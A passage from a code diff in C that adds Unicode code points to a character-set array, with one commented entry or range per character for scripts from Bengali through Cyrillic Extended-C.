+	charset[i++] = 0x9c8;	// BENGALI VOWEL SIGN AI
+	c = 0x9cb;		// from BENGALI VOWEL SIGN O
+	while (c <= 0x9ce)	// ..to BENGALI LETTER KHANDA TA
+		charset[i++] = c++;
+	charset[i++] = 0x9dc;	// BENGALI LETTER RRA
+	charset[i++] = 0x9dd;	// BENGALI LETTER RHA
+	c = 0x9df;		// from BENGALI LETTER YYA
+	while (c <= 0x9e3)	// ..to BENGALI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0x9e6;		// from BENGALI DIGIT ZERO
+	while (c <= 0x9fe)	// ..to BENGALI SANDHI MARK
+		charset[i++] = c++;
+// 0A00..0A7F; Gurmukhi
+	charset[i++] = 0xa01;	// GURMUKHI SIGN ADAK BINDI
+	charset[i++] = 0xa03;	// GURMUKHI SIGN VISARGA
+	c = 0xa05;		// from GURMUKHI LETTER A
+	while (c <= 0xa0a)	// ..to GURMUKHI LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xa0f;	// GURMUKHI LETTER EE
+	charset[i++] = 0xa10;	// GURMUKHI LETTER AI
+	c = 0xa13;		// from GURMUKHI LETTER OO
+	while (c <= 0xa28)	// ..to GURMUKHI LETTER NA
+		charset[i++] = c++;
+	c = 0xa2a;		// from GURMUKHI LETTER PA
+	while (c <= 0xa30)	// ..to GURMUKHI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xa32;	// GURMUKHI LETTER LA
+	charset[i++] = 0xa33;	// GURMUKHI LETTER LLA
+	charset[i++] = 0xa35;	// GURMUKHI LETTER VA
+	charset[i++] = 0xa36;	// GURMUKHI LETTER SHA
+	charset[i++] = 0xa38;	// GURMUKHI LETTER SA
+	charset[i++] = 0xa39;	// GURMUKHI LETTER HA
+	c = 0xa3e;		// from GURMUKHI VOWEL SIGN AA
+	while (c <= 0xa42)	// ..to GURMUKHI VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xa47;	// GURMUKHI VOWEL SIGN EE
+	charset[i++] = 0xa48;	// GURMUKHI VOWEL SIGN AI
+	charset[i++] = 0xa4b;	// GURMUKHI VOWEL SIGN OO
+	charset[i++] = 0xa4d;	// GURMUKHI SIGN VIRAMA
+	c = 0xa59;		// from GURMUKHI LETTER KHHA
+	while (c <= 0xa5c)	// ..to GURMUKHI LETTER RRA
+		charset[i++] = c++;
+	c = 0xa66;		// from GURMUKHI DIGIT ZERO
+	while (c <= 0xa76)	// ..to GURMUKHI ABBREVIATION SIGN
+		charset[i++] = c++;
+// 0A80..0AFF; Gujarati
+	charset[i++] = 0xa81;	// GUJARATI SIGN CANDRABINDU
+	charset[i++] = 0xa83;	// GUJARATI SIGN VISARGA
+	c = 0xa85;		// from GUJARATI LETTER A
+	while (c <= 0xa8d)	// ..to GUJARATI VOWEL CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xa8f;	// GUJARATI LETTER E
+	charset[i++] = 0xa91;	// GUJARATI VOWEL CANDRA O
+	c = 0xa93;		// from GUJARATI LETTER O
+	while (c <= 0xaa8)	// ..to GUJARATI LETTER NA
+		charset[i++] = c++;
+	c = 0xaaa;		// from GUJARATI LETTER PA
+	while (c <= 0xab0)	// ..to GUJARATI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xab2;	// GUJARATI LETTER LA
+	charset[i++] = 0xab3;	// GUJARATI LETTER LLA
+	c = 0xab5;		// from GUJARATI LETTER VA
+	while (c <= 0xab9)	// ..to GUJARATI LETTER HA
+		charset[i++] = c++;
+	c = 0xabc;		// from GUJARATI SIGN NUKTA
+	while (c <= 0xac5)	// ..to GUJARATI VOWEL SIGN CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xac7;	// GUJARATI VOWEL SIGN E
+	charset[i++] = 0xac9;	// GUJARATI VOWEL SIGN CANDRA O
+	charset[i++] = 0xacb;	// GUJARATI VOWEL SIGN O
+	charset[i++] = 0xacd;	// GUJARATI SIGN VIRAMA
+	c = 0xae0;		// from GUJARATI LETTER VOCALIC RR
+	while (c <= 0xae3)	// ..to GUJARATI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xae6;		// from GUJARATI DIGIT ZERO
+	while (c <= 0xaf1)	// ..to GUJARATI RUPEE SIGN
+		charset[i++] = c++;
+	c = 0xaf9;		// from GUJARATI LETTER ZHA
+	while (c <= 0xaff)	// ..to GUJARATI SIGN TWO-CIRCLE NUKTA ABOVE
+		charset[i++] = c++;
+// 0B00..0B7F; Oriya
+	charset[i++] = 0xb01;	// ORIYA SIGN CANDRABINDU
+	charset[i++] = 0xb03;	// ORIYA SIGN VISARGA
+	c = 0xb05;		// from ORIYA LETTER A
+	while (c <= 0xb0c)	// ..to ORIYA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xb0f;	// ORIYA LETTER E
+	charset[i++] = 0xb10;	// ORIYA LETTER AI
+	c = 0xb13;		// from ORIYA LETTER O
+	while (c <= 0xb28)	// ..to ORIYA LETTER NA
+		charset[i++] = c++;
+	c = 0xb2a;		// from ORIYA LETTER PA
+	while (c <= 0xb30)	// ..to ORIYA LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xb32;	// ORIYA LETTER LA
+	charset[i++] = 0xb33;	// ORIYA LETTER LLA
+	c = 0xb35;		// from ORIYA LETTER VA
+	while (c <= 0xb39)	// ..to ORIYA LETTER HA
+		charset[i++] = c++;
+	c = 0xb3c;		// from ORIYA SIGN NUKTA
+	while (c <= 0xb44)	// ..to ORIYA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xb47;	// ORIYA VOWEL SIGN E
+	charset[i++] = 0xb48;	// ORIYA VOWEL SIGN AI
+	charset[i++] = 0xb4b;	// ORIYA VOWEL SIGN O
+	charset[i++] = 0xb4d;	// ORIYA SIGN VIRAMA
+	charset[i++] = 0xb56;	// ORIYA AI LENGTH MARK
+	charset[i++] = 0xb57;	// ORIYA AU LENGTH MARK
+	charset[i++] = 0xb5c;	// ORIYA LETTER RRA
+	charset[i++] = 0xb5d;	// ORIYA LETTER RHA
+	c = 0xb5f;		// from ORIYA LETTER YYA
+	while (c <= 0xb63)	// ..to ORIYA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xb66;		// from ORIYA DIGIT ZERO
+	while (c <= 0xb77)	// ..to ORIYA FRACTION THREE SIXTEENTHS
+		charset[i++] = c++;
+// 0B80..0BFF; Tamil
+	charset[i++] = 0xb82;	// TAMIL SIGN ANUSVARA
+	charset[i++] = 0xb83;	// TAMIL SIGN VISARGA
+	c = 0xb85;		// from TAMIL LETTER A
+	while (c <= 0xb8a)	// ..to TAMIL LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xb8e;	// TAMIL LETTER E
+	charset[i++] = 0xb90;	// TAMIL LETTER AI
+	c = 0xb92;		// from TAMIL LETTER O
+	while (c <= 0xb95)	// ..to TAMIL LETTER KA
+		charset[i++] = c++;
+	charset[i++] = 0xb99;	// TAMIL LETTER NGA
+	charset[i++] = 0xb9a;	// TAMIL LETTER CA
+	charset[i++] = 0xb9e;	// TAMIL LETTER NYA
+	charset[i++] = 0xb9f;	// TAMIL LETTER TTA
+	charset[i++] = 0xba3;	// TAMIL LETTER NNA
+	charset[i++] = 0xba4;	// TAMIL LETTER TA
+	charset[i++] = 0xba8;	// TAMIL LETTER NA
+	charset[i++] = 0xbaa;	// TAMIL LETTER PA
+	c = 0xbae;		// from TAMIL LETTER MA
+	while (c <= 0xbb9)	// ..to TAMIL LETTER HA
+		charset[i++] = c++;
+	c = 0xbbe;		// from TAMIL VOWEL SIGN AA
+	while (c <= 0xbc2)	// ..to TAMIL VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xbc6;	// TAMIL VOWEL SIGN E
+	charset[i++] = 0xbc8;	// TAMIL VOWEL SIGN AI
+	c = 0xbca;		// from TAMIL VOWEL SIGN O
+	while (c <= 0xbcd)	// ..to TAMIL SIGN VIRAMA
+		charset[i++] = c++;
+	c = 0xbe6;		// from TAMIL DIGIT ZERO
+	while (c <= 0xbfa)	// ..to TAMIL NUMBER SIGN
+		charset[i++] = c++;
+// 0C00..0C7F; Telugu
+	c = 0xc00;		// from TELUGU SIGN COMBINING CANDRABINDU ABOVE
+	while (c <= 0xc0c)	// ..to TELUGU LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc0e;	// TELUGU LETTER E
+	charset[i++] = 0xc10;	// TELUGU LETTER AI
+	c = 0xc12;		// from TELUGU LETTER O
+	while (c <= 0xc28)	// ..to TELUGU LETTER NA
+		charset[i++] = c++;
+	c = 0xc2a;		// from TELUGU LETTER PA
+	while (c <= 0xc39)	// ..to TELUGU LETTER HA
+		charset[i++] = c++;
+	c = 0xc3d;		// from TELUGU SIGN AVAGRAHA
+	while (c <= 0xc44)	// ..to TELUGU VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xc46;	// TELUGU VOWEL SIGN E
+	charset[i++] = 0xc48;	// TELUGU VOWEL SIGN AI
+	c = 0xc4a;		// from TELUGU VOWEL SIGN O
+	while (c <= 0xc4d)	// ..to TELUGU SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xc55;	// TELUGU LENGTH MARK
+	charset[i++] = 0xc56;	// TELUGU AI LENGTH MARK
+	charset[i++] = 0xc58;	// TELUGU LETTER TSA
+	charset[i++] = 0xc5a;	// TELUGU LETTER RRRA
+	c = 0xc60;		// from TELUGU LETTER VOCALIC RR
+	while (c <= 0xc63)	// ..to TELUGU VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xc66;		// from TELUGU DIGIT ZERO
+	while (c <= 0xc6f)	// ..to TELUGU DIGIT NINE
+		charset[i++] = c++;
+	c = 0xc78;		// from TELUGU FRACTION DIGIT ZERO FOR ODD POWERS OF FOUR
+	while (c <= 0xc7f)	// ..to TELUGU SIGN TUUMU
+		charset[i++] = c++;
+// 0C80..0CFF; Kannada
+	c = 0xc80;		// from KANNADA SIGN SPACING CANDRABINDU
+	while (c <= 0xc8c)	// ..to KANNADA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc8e;	// KANNADA LETTER E
+	charset[i++] = 0xc90;	// KANNADA LETTER AI
+	c = 0xc92;		// from KANNADA LETTER O
+	while (c <= 0xca8)	// ..to KANNADA LETTER NA
+		charset[i++] = c++;
+	c = 0xcaa;		// from KANNADA LETTER PA
+	while (c <= 0xcb3)	// ..to KANNADA LETTER LLA
+		charset[i++] = c++;
+	c = 0xcb5;		// from KANNADA LETTER VA
+	while (c <= 0xcb9)	// ..to KANNADA LETTER HA
+		charset[i++] = c++;
+	c = 0xcbc;		// from KANNADA SIGN NUKTA
+	while (c <= 0xcc4)	// ..to KANNADA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xcc6;	// KANNADA VOWEL SIGN E
+	charset[i++] = 0xcc8;	// KANNADA VOWEL SIGN AI
+	c = 0xcca;		// from KANNADA VOWEL SIGN O
+	while (c <= 0xccd)	// ..to KANNADA SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xcd5;	// KANNADA LENGTH MARK
+	charset[i++] = 0xcd6;	// KANNADA AI LENGTH MARK
+	c = 0xce0;		// from KANNADA LETTER VOCALIC RR
+	while (c <= 0xce3)	// ..to KANNADA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xce6;		// from KANNADA DIGIT ZERO
+	while (c <= 0xcef)	// ..to KANNADA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xcf1;	// KANNADA SIGN JIHVAMULIYA
+	charset[i++] = 0xcf2;	// KANNADA SIGN UPADHMANIYA
+// 0D00..0D7F; Malayalam
+	c = 0xd00;		// from MALAYALAM SIGN COMBINING ANUSVARA ABOVE
+	while (c <= 0xd03)	// ..to MALAYALAM SIGN VISARGA
+		charset[i++] = c++;
+	c = 0xd05;		// from MALAYALAM LETTER A
+	while (c <= 0xd0c)	// ..to MALAYALAM LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xd0e;	// MALAYALAM LETTER E
+	charset[i++] = 0xd10;	// MALAYALAM LETTER AI
+	c = 0xd12;		// from MALAYALAM LETTER O
+	while (c <= 0xd44)	// ..to MALAYALAM VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xd46;	// MALAYALAM VOWEL SIGN E
+	charset[i++] = 0xd48;	// MALAYALAM VOWEL SIGN AI
+	c = 0xd4a;		// from MALAYALAM VOWEL SIGN O
+	while (c <= 0xd4f)	// ..to MALAYALAM SIGN PARA
+		charset[i++] = c++;
+	c = 0xd54;		// from MALAYALAM LETTER CHILLU M
+	while (c <= 0xd63)	// ..to MALAYALAM VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xd66;		// from MALAYALAM DIGIT ZERO
+	while (c <= 0xd7f)	// ..to MALAYALAM LETTER CHILLU K
+		charset[i++] = c++;
+// 0D80..0DFF; Sinhala
+	charset[i++] = 0xd82;	// SINHALA SIGN ANUSVARAYA
+	charset[i++] = 0xd83;	// SINHALA SIGN VISARGAYA
+	c = 0xd85;		// from SINHALA LETTER AYANNA
+	while (c <= 0xd96)	// ..to SINHALA LETTER AUYANNA
+		charset[i++] = c++;
+	c = 0xd9a;		// from SINHALA LETTER ALPAPRAANA KAYANNA
+	while (c <= 0xdb1)	// ..to SINHALA LETTER DANTAJA NAYANNA
+		charset[i++] = c++;
+	c = 0xdb3;		// from SINHALA LETTER SANYAKA DAYANNA
+	while (c <= 0xdbb)	// ..to SINHALA LETTER RAYANNA
+		charset[i++] = c++;
+	c = 0xdc0;		// from SINHALA LETTER VAYANNA
+	while (c <= 0xdc6)	// ..to SINHALA LETTER FAYANNA
+		charset[i++] = c++;
+	c = 0xdcf;		// from SINHALA VOWEL SIGN AELA-PILLA
+	while (c <= 0xdd4)	// ..to SINHALA VOWEL SIGN KETTI PAA-PILLA
+		charset[i++] = c++;
+	c = 0xdd8;		// from SINHALA VOWEL SIGN GAETTA-PILLA
+	while (c <= 0xddf)	// ..to SINHALA VOWEL SIGN GAYANUKITTA
+		charset[i++] = c++;
+	c = 0xde6;		// from SINHALA LITH DIGIT ZERO
+	while (c <= 0xdef)	// ..to SINHALA LITH DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xdf2;	// SINHALA VOWEL SIGN DIGA GAETTA-PILLA
+	charset[i++] = 0xdf4;	// SINHALA PUNCTUATION KUNDDALIYA
+// 0E00..0E7F; Thai
+	c = 0xe01;		// from THAI CHARACTER KO KAI
+	while (c <= 0xe3a)	// ..to THAI CHARACTER PHINTHU
+		charset[i++] = c++;
+	c = 0xe3f;		// from THAI CURRENCY SYMBOL BAHT
+	while (c <= 0xe5b)	// ..to THAI CHARACTER KHOMUT
+		charset[i++] = c++;
+// 0E80..0EFF; Lao
+	charset[i++] = 0xe81;	// LAO LETTER KO
+	charset[i++] = 0xe82;	// LAO LETTER KHO SUNG
+	charset[i++] = 0xe87;	// LAO LETTER NGO
+	charset[i++] = 0xe88;	// LAO LETTER CO
+	c = 0xe94;		// from LAO LETTER DO
+	while (c <= 0xe97)	// ..to LAO LETTER THO TAM
+		charset[i++] = c++;
+	c = 0xe99;		// from LAO LETTER NO
+	while (c <= 0xe9f)	// ..to LAO LETTER FO SUNG
+		charset[i++] = c++;
+	charset[i++] = 0xea1;	// LAO LETTER MO
+	charset[i++] = 0xea3;	// LAO LETTER LO LING
+	charset[i++] = 0xeaa;	// LAO LETTER SO SUNG
+	charset[i++] = 0xeab;	// LAO LETTER HO SUNG
+	c = 0xead;		// from LAO LETTER O
+	while (c <= 0xeb9)	// ..to LAO VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xebb;	// LAO VOWEL SIGN MAI KON
+	charset[i++] = 0xebd;	// LAO SEMIVOWEL SIGN NYO
+	c = 0xec0;		// from LAO VOWEL SIGN E
+	while (c <= 0xec4)	// ..to LAO VOWEL SIGN AI
+		charset[i++] = c++;
+	c = 0xec8;		// from LAO TONE MAI EK
+	while (c <= 0xecd)	// ..to LAO NIGGAHITA
+		charset[i++] = c++;
+	c = 0xed0;		// from LAO DIGIT ZERO
+	while (c <= 0xed9)	// ..to LAO DIGIT NINE
+		charset[i++] = c++;
+	c = 0xedc;		// from LAO HO NO
+	while (c <= 0xedf)	// ..to LAO LETTER KHMU NYO
+		charset[i++] = c++;
+// 0F00..0FFF; Tibetan
+	c = 0xf00;		// from TIBETAN SYLLABLE OM
+	while (c <= 0xf47)	// ..to TIBETAN LETTER JA
+		charset[i++] = c++;
+	c = 0xf49;		// from TIBETAN LETTER NYA
+	while (c <= 0xf6c)	// ..to TIBETAN LETTER RRA
+		charset[i++] = c++;
+	c = 0xf71;		// from TIBETAN VOWEL SIGN AA
+	while (c <= 0xf97)	// ..to TIBETAN SUBJOINED LETTER JA
+		charset[i++] = c++;
+	c = 0xf99;		// from TIBETAN SUBJOINED LETTER NYA
+	while (c <= 0xfbc)	// ..to TIBETAN SUBJOINED LETTER FIXED-FORM RA
+		charset[i++] = c++;
+	c = 0xfbe;		// from TIBETAN KU RU KHA
+	while (c <= 0xfcc)	// ..to TIBETAN SYMBOL NOR BU BZHI -KHYIL
+		charset[i++] = c++;
+	c = 0xfce;		// from TIBETAN SIGN RDEL NAG RDEL DKAR
+	while (c <= 0xfda)	// ..to TIBETAN MARK TRAILING MCHAN RTAGS
+		charset[i++] = c++;
+// 1000..109F; Myanmar
+	c = 0x1000;		// from MYANMAR LETTER KA
+	while (c <= 0x109f)	// ..to MYANMAR SYMBOL SHAN EXCLAMATION
+		charset[i++] = c++;
+// 10A0..10FF; Georgian
+	c = 0x10a0;		// from GEORGIAN CAPITAL LETTER AN
+	while (c <= 0x10c5)	// ..to GEORGIAN CAPITAL LETTER HOE
+		charset[i++] = c++;
+	c = 0x10d0;		// from GEORGIAN LETTER AN
+	while (c <= 0x10ff)	// ..to GEORGIAN LETTER LABIAL SIGN
+		charset[i++] = c++;
+// 1100..11FF; Hangul Jamo
+	c = 0x1100;		// from HANGUL CHOSEONG KIYEOK
+	while (c <= 0x11ff)	// ..to HANGUL JONGSEONG SSANGNIEUN
+		charset[i++] = c++;
+// 1200..137F; Ethiopic
+	c = 0x1200;		// from ETHIOPIC SYLLABLE HA
+	while (c <= 0x1248)	// ..to ETHIOPIC SYLLABLE QWA
+		charset[i++] = c++;
+	c = 0x124a;		// from ETHIOPIC SYLLABLE QWI
+	while (c <= 0x124d)	// ..to ETHIOPIC SYLLABLE QWE
+		charset[i++] = c++;
+	c = 0x1250;		// from ETHIOPIC SYLLABLE QHA
+	while (c <= 0x1256)	// ..to ETHIOPIC SYLLABLE QHO
+		charset[i++] = c++;
+	c = 0x125a;		// from ETHIOPIC SYLLABLE QHWI
+	while (c <= 0x125d)	// ..to ETHIOPIC SYLLABLE QHWE
+		charset[i++] = c++;
+	c = 0x1260;		// from ETHIOPIC SYLLABLE BA
+	while (c <= 0x1288)	// ..to ETHIOPIC SYLLABLE XWA
+		charset[i++] = c++;
+	c = 0x128a;		// from ETHIOPIC SYLLABLE XWI
+	while (c <= 0x128d)	// ..to ETHIOPIC SYLLABLE XWE
+		charset[i++] = c++;
+	c = 0x1290;		// from ETHIOPIC SYLLABLE NA
+	while (c <= 0x12b0)	// ..to ETHIOPIC SYLLABLE KWA
+		charset[i++] = c++;
+	c = 0x12b2;		// from ETHIOPIC SYLLABLE KWI
+	while (c <= 0x12b5)	// ..to ETHIOPIC SYLLABLE KWE
+		charset[i++] = c++;
+	c = 0x12b8;		// from ETHIOPIC SYLLABLE KXA
+	while (c <= 0x12be)	// ..to ETHIOPIC SYLLABLE KXO
+		charset[i++] = c++;
+	c = 0x12c2;		// from ETHIOPIC SYLLABLE KXWI
+	while (c <= 0x12c5)	// ..to ETHIOPIC SYLLABLE KXWE
+		charset[i++] = c++;
+	c = 0x12c8;		// from ETHIOPIC SYLLABLE WA
+	while (c <= 0x12d6)	// ..to ETHIOPIC SYLLABLE PHARYNGEAL O
+		charset[i++] = c++;
+	c = 0x12d8;		// from ETHIOPIC SYLLABLE ZA
+	while (c <= 0x1310)	// ..to ETHIOPIC SYLLABLE GWA
+		charset[i++] = c++;
+	c = 0x1312;		// from ETHIOPIC SYLLABLE GWI
+	while (c <= 0x1315)	// ..to ETHIOPIC SYLLABLE GWE
+		charset[i++] = c++;
+	c = 0x1318;		// from ETHIOPIC SYLLABLE GGA
+	while (c <= 0x135a)	// ..to ETHIOPIC SYLLABLE FYA
+		charset[i++] = c++;
+	c = 0x135d;		// from ETHIOPIC COMBINING GEMINATION AND VOWEL LENGTH MARK
+	while (c <= 0x137c)	// ..to ETHIOPIC NUMBER TEN THOUSAND
+		charset[i++] = c++;
+// 1380..139F; Ethiopic Supplement
+	c = 0x1380;		// from ETHIOPIC SYLLABLE SEBATBEIT MWA
+	while (c <= 0x1399)	// ..to ETHIOPIC TONAL MARK KURT
+		charset[i++] = c++;
+// 13A0..13FF; Cherokee
+	c = 0x13a0;		// from CHEROKEE LETTER A
+	while (c <= 0x13f5)	// ..to CHEROKEE LETTER MV
+		charset[i++] = c++;
+	c = 0x13f8;		// from CHEROKEE SMALL LETTER YE
+	while (c <= 0x13fd)	// ..to CHEROKEE SMALL LETTER MV
+		charset[i++] = c++;
+// 1400..167F; Unified Canadian Aboriginal Syllabics
+	c = 0x1400;		// from CANADIAN SYLLABICS HYPHEN
+	while (c <= 0x167f)	// ..to CANADIAN SYLLABICS BLACKFOOT W
+		charset[i++] = c++;
+// 1680..169F; Ogham
+	c = 0x1680;		// from OGHAM SPACE MARK
+	while (c <= 0x169c)	// ..to OGHAM REVERSED FEATHER MARK
+		charset[i++] = c++;
+// 16A0..16FF; Runic
+	c = 0x16a0;		// from RUNIC LETTER FEHU FEOH FE F
+	while (c <= 0x16f8)	// ..to RUNIC LETTER FRANKS CASKET AESC
+		charset[i++] = c++;
+// 1700..171F; Tagalog
+	c = 0x1700;		// from TAGALOG LETTER A
+	while (c <= 0x170c)	// ..to TAGALOG LETTER YA
+		charset[i++] = c++;
+	c = 0x170e;		// from TAGALOG LETTER LA
+	while (c <= 0x1714)	// ..to TAGALOG SIGN VIRAMA
+		charset[i++] = c++;
+// 1720..173F; Hanunoo
+	c = 0x1720;		// from HANUNOO LETTER A
+	while (c <= 0x1736)	// ..to PHILIPPINE DOUBLE PUNCTUATION
+		charset[i++] = c++;
+// 1740..175F; Buhid
+	c = 0x1740;		// from BUHID LETTER A
+	while (c <= 0x1753)	// ..to BUHID VOWEL SIGN U
+		charset[i++] = c++;
+// 1760..177F; Tagbanwa
+	c = 0x1760;		// from TAGBANWA LETTER A
+	while (c <= 0x176c)	// ..to TAGBANWA LETTER YA
+		charset[i++] = c++;
+	charset[i++] = 0x176e;	// TAGBANWA LETTER LA
+	charset[i++] = 0x1770;	// TAGBANWA LETTER SA
+	charset[i++] = 0x1772;	// TAGBANWA VOWEL SIGN I
+	charset[i++] = 0x1773;	// TAGBANWA VOWEL SIGN U
+// 1780..17FF; Khmer
+	c = 0x1780;		// from KHMER LETTER KA
+	while (c <= 0x17dd)	// ..to KHMER SIGN ATTHACAN
+		charset[i++] = c++;
+	c = 0x17e0;		// from KHMER DIGIT ZERO
+	while (c <= 0x17e9)	// ..to KHMER DIGIT NINE
+		charset[i++] = c++;
+	c = 0x17f0;		// from KHMER SYMBOL LEK ATTAK SON
+	while (c <= 0x17f9)	// ..to KHMER SYMBOL LEK ATTAK PRAM-BUON
+		charset[i++] = c++;
+// 1800..18AF; Mongolian
+	c = 0x1800;		// from MONGOLIAN BIRGA
+	while (c <= 0x180e)	// ..to MONGOLIAN VOWEL SEPARATOR
+		charset[i++] = c++;
+	c = 0x1810;		// from MONGOLIAN DIGIT ZERO
+	while (c <= 0x1819)	// ..to MONGOLIAN DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1820;		// from MONGOLIAN LETTER A
+	while (c <= 0x1878)	// ..to MONGOLIAN LETTER CHA WITH TWO DOTS
+		charset[i++] = c++;
+	c = 0x1880;		// from MONGOLIAN LETTER ALI GALI ANUSVARA ONE
+	while (c <= 0x18aa)	// ..to MONGOLIAN LETTER MANCHU ALI GALI LHA
+		charset[i++] = c++;
+// 18B0..18FF; Unified Canadian Aboriginal Syllabics Extended
+	c = 0x18b0;		// from CANADIAN SYLLABICS OY
+	while (c <= 0x18f5)	// ..to CANADIAN SYLLABICS CARRIER DENTAL S
+		charset[i++] = c++;
+// 1900..194F; Limbu
+	c = 0x1900;		// from LIMBU VOWEL-CARRIER LETTER
+	while (c <= 0x191e)	// ..to LIMBU LETTER TRA
+		charset[i++] = c++;
+	c = 0x1920;		// from LIMBU VOWEL SIGN A
+	while (c <= 0x192b)	// ..to LIMBU SUBJOINED LETTER WA
+		charset[i++] = c++;
+	c = 0x1930;		// from LIMBU SMALL LETTER KA
+	while (c <= 0x193b)	// ..to LIMBU SIGN SA-I
+		charset[i++] = c++;
+	c = 0x1944;		// from LIMBU EXCLAMATION MARK
+	while (c <= 0x194f)	// ..to LIMBU DIGIT NINE
+		charset[i++] = c++;
+// 1950..197F; Tai Le
+	c = 0x1950;		// from TAI LE LETTER KA
+	while (c <= 0x196d)	// ..to TAI LE LETTER AI
+		charset[i++] = c++;
+	c = 0x1970;		// from TAI LE LETTER TONE-2
+	while (c <= 0x1974)	// ..to TAI LE LETTER TONE-6
+		charset[i++] = c++;
+// 1980..19DF; New Tai Lue
+	c = 0x1980;		// from NEW TAI LUE LETTER HIGH QA
+	while (c <= 0x19ab)	// ..to NEW TAI LUE LETTER LOW SUA
+		charset[i++] = c++;
+	c = 0x19b0;		// from NEW TAI LUE VOWEL SIGN VOWEL SHORTENER
+	while (c <= 0x19c9)	// ..to NEW TAI LUE TONE MARK-2
+		charset[i++] = c++;
+	c = 0x19d0;		// from NEW TAI LUE DIGIT ZERO
+	while (c <= 0x19da)	// ..to NEW TAI LUE THAM DIGIT ONE
+		charset[i++] = c++;
+	charset[i++] = 0x19de;	// NEW TAI LUE SIGN LAE
+	charset[i++] = 0x19df;	// NEW TAI LUE SIGN LAEV
+// 19E0..19FF; Khmer Symbols
+	c = 0x19e0;		// from KHMER SYMBOL PATHAMASAT
+	while (c <= 0x19ff)	// ..to KHMER SYMBOL DAP-PRAM ROC
+		charset[i++] = c++;
+// 1A00..1A1F; Buginese
+	c = 0x1a00;		// from BUGINESE LETTER KA
+	while (c <= 0x1a1b)	// ..to BUGINESE VOWEL SIGN AE
+		charset[i++] = c++;
+	charset[i++] = 0x1a1e;	// BUGINESE PALLAWA
+	charset[i++] = 0x1a1f;	// BUGINESE END OF SECTION
+// 1A20..1AAF; Tai Tham
+	c = 0x1a20;		// from TAI THAM LETTER HIGH KA
+	while (c <= 0x1a5e)	// ..to TAI THAM CONSONANT SIGN SA
+		charset[i++] = c++;
+	c = 0x1a60;		// from TAI THAM SIGN SAKOT
+	while (c <= 0x1a7c)	// ..to TAI THAM SIGN KHUEN-LUE KARAN
+		charset[i++] = c++;
+	c = 0x1a7f;		// from TAI THAM COMBINING CRYPTOGRAMMIC DOT
+	while (c <= 0x1a89)	// ..to TAI THAM HORA DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1a90;		// from TAI THAM THAM DIGIT ZERO
+	while (c <= 0x1a99)	// ..to TAI THAM THAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1aa0;		// from TAI THAM SIGN WIANG
+	while (c <= 0x1aad)	// ..to TAI THAM SIGN CAANG
+		charset[i++] = c++;
+// 1AB0..1AFF; Combining Diacritical Marks Extended
+	c = 0x1ab0;		// from COMBINING DOUBLED CIRCUMFLEX ACCENT
+	while (c <= 0x1abe)	// ..to COMBINING PARENTHESES OVERLAY
+		charset[i++] = c++;
+// 1B00..1B7F; Balinese
+	c = 0x1b00;		// from BALINESE SIGN ULU RICEM
+	while (c <= 0x1b4b)	// ..to BALINESE LETTER ASYURA SASAK
+		charset[i++] = c++;
+	c = 0x1b50;		// from BALINESE DIGIT ZERO
+	while (c <= 0x1b7c)	// ..to BALINESE MUSICAL SYMBOL LEFT-HAND OPEN PING
+		charset[i++] = c++;
+// 1B80..1BBF; Sundanese
+	c = 0x1b80;		// from SUNDANESE SIGN PANYECEK
+	while (c <= 0x1bbf)	// ..to SUNDANESE LETTER FINAL M
+		charset[i++] = c++;
+// 1BC0..1BFF; Batak
+	c = 0x1bc0;		// from BATAK LETTER A
+	while (c <= 0x1bf3)	// ..to BATAK PANONGONAN
+		charset[i++] = c++;
+	c = 0x1bfc;		// from BATAK SYMBOL BINDU NA METEK
+	while (c <= 0x1bff)	// ..to BATAK SYMBOL BINDU PANGOLAT
+		charset[i++] = c++;
+// 1C00..1C4F; Lepcha
+	c = 0x1c00;		// from LEPCHA LETTER KA
+	while (c <= 0x1c37)	// ..to LEPCHA SIGN NUKTA
+		charset[i++] = c++;
+	c = 0x1c3b;		// from LEPCHA PUNCTUATION TA-ROL
+	while (c <= 0x1c49)	// ..to LEPCHA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1c4d;	// LEPCHA LETTER TTA
+	charset[i++] = 0x1c4f;	// LEPCHA LETTER DDA
+// 1C50..1C7F; Ol Chiki
+	c = 0x1c50;		// from OL CHIKI DIGIT ZERO
+	while (c <= 0x1c7f)	// ..to OL CHIKI PUNCTUATION DOUBLE MUCAAD
+		charset[i++] = c++;
+// 1C80..1C8F; Cyrillic Extended-C
+	c = 0x1c80;		// from CYRILLIC SMALL LETTER ROUNDED VE
+	while (c <= 0x1c88)	// ..to CYRILLIC SMALL LETTER UNBLENDED UK
